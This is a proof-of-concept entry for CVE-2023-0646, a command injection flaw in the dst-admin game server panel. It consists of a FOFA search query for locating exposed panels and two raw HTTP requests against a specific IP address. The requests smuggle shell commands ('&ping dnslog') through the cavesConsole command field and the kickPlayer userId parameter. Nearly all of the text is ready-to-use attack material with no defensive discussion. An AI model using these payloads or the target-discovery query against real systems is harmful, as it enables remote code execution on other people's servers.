
dst-admin cavesConsole Remote Command Execution Vulnerability (CVE-2023-0646)

FOFA query

title=="饥荒管理后台"

PoC

POST /home/cavesConsole HTTP/1.1
Host: 101.35.120.58:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Cookie: JSESSIONID=7b0bfc18-03ff-40ec-95aa-5d520734fe18;rememberMe=deleteMe;
Accept-Encoding: gzip
Content-Length: 31

{"command":"\"&ping dnslog;\""}

GET /home/kickPlayer?userId=%5C%22)%5Cn%22%26ping+dnslog%26screen%20-S%20%22DST_CAVES%22%20-p%200%20-X%20stuff%20%22TheNet%3AKick(%5C%22 HTTP/1.1
Host: 101.35.120.58:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: JSESSIONID=5c2ca195-7aa2-4be2-9383-1287e2976132;rememberMe=deleteMe;
Accept-Encoding: gzip